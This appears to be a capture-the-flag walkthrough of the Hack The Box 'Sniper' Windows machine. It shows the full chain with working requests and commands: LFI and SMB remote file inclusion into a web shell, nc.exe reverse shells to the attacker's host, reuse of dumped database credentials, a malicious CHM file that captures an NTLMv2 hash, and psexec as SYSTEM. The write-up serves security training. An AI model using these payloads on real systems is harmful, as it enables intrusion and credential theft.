Post

Sniper - Medium - Windows

Sniper - Medium - Windows

Nmap scan

Scan reveals a Windows machine running IIS in addition to SMB.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Nmap 7.93 scan initiated Tue Aug  1 01:53:27 2023 as: nmap -sC -sV -p- -oA nmap/sniper-allports -v 10.129.229.6
Nmap scan report for 10.129.229.6
Host is up (0.035s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Sniper Co.
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49667/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-08-01T07:56:37
|_  start_date: N/A
|_clock-skew: 7h00m00s

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug  1 01:57:12 2023 -- 1 IP address (1 host up) scanned in 224.87 seconds

Gobuster - port 80

Two interesting directories were discovered on the web service, user and blog.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌─[parrot@parrot]─[~/hackthebox/sniper]
└──╼ $gobuster dir -u http://10.129.229.6/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.229.6/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/08/01 02:00:47 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 150] [--> http://10.129.229.6/images/]
/js                   (Status: 301) [Size: 146] [--> http://10.129.229.6/js/]    
/css                  (Status: 301) [Size: 147] [--> http://10.129.229.6/css/]   
/user                 (Status: 301) [Size: 148] [--> http://10.129.229.6/user/]  
/blog                 (Status: 301) [Size: 148] [--> http://10.129.229.6/blog/]

Gobuster - web user directory

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌─[parrot@parrot]─[~/hackthebox/sniper]
└──╼ $gobuster dir -u http://10.129.229.6/user/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.229.6/user/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2023/08/01 02:05:24 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 155] [--> http://10.129.229.6/user/images/]
/js                   (Status: 301) [Size: 151] [--> http://10.129.229.6/user/js/]    
/css                  (Status: 301) [Size: 152] [--> http://10.129.229.6/user/css/]   
/logout.php           (Status: 302) [Size: 3] [--> login.php]                         
/login.php            (Status: 200) [Size: 5456]                                      
/db.php               (Status: 200) [Size: 0]                                         
/index.php            (Status: 302) [Size: 0] [--> login.php]                         
/auth.php             (Status: 302) [Size: 0] [--> login.php]                         
/fonts                (Status: 301) [Size: 154] [--> http://10.129.229.6/user/fonts/] 
/registration.php     (Status: 200) [Size: 5922]                                      
/vendor               (Status: 301) [Size: 155] [--> http://10.129.229.6/user/vendor/]

Gobuster - web blog directory

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌─[parrot@parrot]─[~/hackthebox/sniper]
└──╼ $gobuster dir -u http://10.129.229.6/blog/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.229.6/blog/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2023/08/01 02:07:43 Starting gobuster in directory enumeration mode
===============================================================
/js                   (Status: 301) [Size: 151] [--> http://10.129.229.6/blog/js/]
/css                  (Status: 301) [Size: 152] [--> http://10.129.229.6/blog/css/]
/index.php            (Status: 200) [Size: 5704]                                   
/blog-en.php          (Status: 200) [Size: 4341] 

Inspecting blog directory - LFI discovery

A typical PHP LFI was discovered when passing a file to the language parameter. The example below shows it reading the hosts file on the Windows server.

Request - LFI

1
2
3
4
5
6
7
8
9
10
GET /blog/?lang=/windows/system32/drivers/etc/hosts HTTP/1.1
Host: 10.129.229.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=sag331fan90t32cm1a7v1dc5cj
Upgrade-Insecure-Requests: 1

Response - LFI

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.3.1
Date: Tue, 01 Aug 2023 08:10:07 GMT
Connection: close
Content-Length: 2187

<html>
*SNIPPED*
</head>

<body>
*SNIPPED*
</body>

</html>
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost
</body>
</html>	

RCE with RFI

It was possible to load remote resources with the same lang parameter as shown below. If the PHP function is using includes it may be possible to get code execution. I setup an SMB server on my end and hosted PHP file which will run system commands passed as a parameter as shown below.

Request - RCE

1
2
3
4
5
6
7
8
9
10
GET /blog/?lang=\\10.10.14.139\ctf\cmd.php&cmd=whoami HTTP/1.1
Host: 10.129.229.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=sag331fan90t32cm1a7v1dc5cj
Upgrade-Insecure-Requests: 1

Response - RCE

The system returned the output of the whois command within the response proving its possible to get code execution.

1
2
3
4
5
</html>
nt authority\iusr

</body>
</html>

Reverse Shell - RCE

Request was changed to a POST request and modified to suit the requirements. This time a reverse shell payload was passed as a parameter for code execution.

Request - Reverse Shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /blog/index.php?lang=\\10.10.14.139\ctf\cmd.php  HTTP/1.1
Host: 10.129.229.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=sag331fan90t32cm1a7v1dc5cj
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

cmd=\\10.10.14.139\ctf\nc.exe+10.10.14.139+9001+-e+powershell

Response - Reverse Shell

1
2
3
4
5
6
7
8
9
10
11
┌─[parrot@parrot]─[/srv/smb]
└──╼ $nc -lvnp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.129.229.6.
Ncat: Connection from 10.129.229.6:49693.
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\inetpub\wwwroot\blog> 

Dumping config files

Exploring the file system uncovered a file with database credentials.

1
2
3
4
5
6
7
8
9
10
11
12
13
PS C:\inetpub\wwwroot\user> type db.php
type db.php
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
  {
  echo "Failed to connect to MySQL: " . mysqli_connect_error();
  }
?>
PS C:\inetpub\wwwroot\user> 

Logging in as Chris

The credentials were valid for a user on the system called Chris. It was possible to invoke commands as Chris using PowerShell.

Storing password in a secure string object.

1
$password = ConvertTo-SecureString "36mEAhz/B8xQ~2VM" -AsPlainText -Force

Creating a new credential object

1
$creds = New-Object System.Management.Automation.PSCredential("SNIPER\Chris", $password)

Invoking a command - whois test

1
2
3
Invoke-Command -ComputerName Sniper -Credential $creds -ScriptBlock {whoami}
sniper\chris
PS C:\inetpub\wwwroot\blog>

Invoking a command - reverse shell

1
Invoke-Command -ComputerName Sniper -Credential $creds -ScriptBlock {\\10.10.14.139\ctf\nc.exe 10.10.14.139 9003 -e powershell}

Reverse Shell - Chris

After invoking the command as Chris it was possible to gain a reverse shell as that user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌─[✗]─[parrot@parrot]─[~/hackthebox/sniper]
└──╼ $rlwrap nc -lvnp 9003
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9003
Ncat: Listening on 0.0.0.0:9003
Ncat: Connection from 10.129.229.6.
Ncat: Connection from 10.129.229.6:49717.
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

whoami
whoami
sniper\chris
PS C:\Users\Chris\Documents>

Docs directory - CHM files

There was a file on the system hinting that the Docs directory on the drive is being monitored for new instructions. Next step will be to craft a malicious CHM file and upload it. HTML Help Workshop was used to create and compile the file.

HTML file added to CHM project

1
2
3
4
5
<html>
<body>
<img src=\\10.10.14.139\ctf\img.png />
</body>
</html>

Compiling the CHM

1
2
3
4
5
6
7
8
9
10
11
12
13
14
Microsoft HTML Help Compiler 4.74.8702

Compiling c:\Users\commando\Desktop\sniper.chm


Compile time: 0 minutes, 26 seconds
1	Topic
0	Local links
0	Internet links
0	Graphics


Created c:\Users\commando\Desktop\sniper.chm, 10,280 bytes
Compression increased file by 10,208 bytes.

Writing the CHM file to Docs

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
    Directory: C:\Docs


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/11/2019   9:31 AM            285 note.txt                                                              
-a----        4/11/2019   9:17 AM         552607 php for dummies-trial.pdf                                             


wget 10.10.14.139:8000/sniper.chm -O sniper.chm
wget 10.10.14.139:8000/sniper.chm -O sniper.chm
ls
ls


    Directory: C:\Docs


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/11/2019   9:31 AM            285 note.txt                                                              
-a----        4/11/2019   9:17 AM         552607 php for dummies-trial.pdf                                             
-a----         8/1/2023   5:41 AM          10280 sniper.chm                                                            


PS C:\Docs>

Responder - NTLMv2 hash returned

After writing the malicious CHM file to the Docs directory responder got a hit. When the CHM file was opened it automatically attempted to load the image within the HTML. That image was pointed towards the SMB service on my machine. Responder was able to catch the hash which belongs to the administrator.

NTLMv2 hash captured

1
2
3
4
5
[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.229.6
[SMB] NTLMv2-SSP Username : SNIPER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::SNIPER:f4807538bb1232d6:D16DBDA045E432A88753DD0A49D5A435:010100000000000000BC0C5943C4D901038134D132889FCA0000000002000800570051003500550001001E00570049004E002D004D00430032005600560055005800570059003900330004003400570049004E002D004D0043003200560056005500580057005900390033002E0057005100350055002E004C004F00430041004C000300140057005100350055002E004C004F00430041004C000500140057005100350055002E004C004F00430041004C000700080000BC0C5943C4D9010600040002000000080030003000000000000000000000000030000087903AC9D5D3B090468899CF3DE28FFDD734EB1C81D3FB35F47CD6EE9B9CCB4F0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E00310033003900000000000000000000000000

Cracking the Hash

John was able to crack the hash using the rockyou wordlist.

1
2
3
4
5
6
7
8
9
10
┌─[parrot@parrot]─[~/hackthebox/sniper]
└──╼ $john admin_ntlm --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
b******1     (Administrator)
1g 0:00:00:00 DONE (2023-08-01 06:54) 1.449g/s 2831Kp/s 2831Kc/s 2831KC/s byrd81..burlfish8
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

psexec.py login - administrator

It was possible to use psexec.py to login to the machine as admin and capture the root password.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌─[✗]─[parrot@parrot]─[~/hackthebox/sniper]
└──╼ $psexec.py administrator@10.129.229.6
Impacket v0.10.1.dev1+20230718.100545.fdbd2568 - Copyright 2022 Fortra

Password:
[*] Requesting shares on 10.129.229.6.....
[*] Found writable share ADMIN$
[*] Uploading file cRyrvaag.exe
[*] Opening SVCManager on 10.129.229.6.....
[*] Creating service RlYt on 10.129.229.6.....
[*] Starting service RlYt.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> 
This post is licensed under CC BY 4.0 by the author.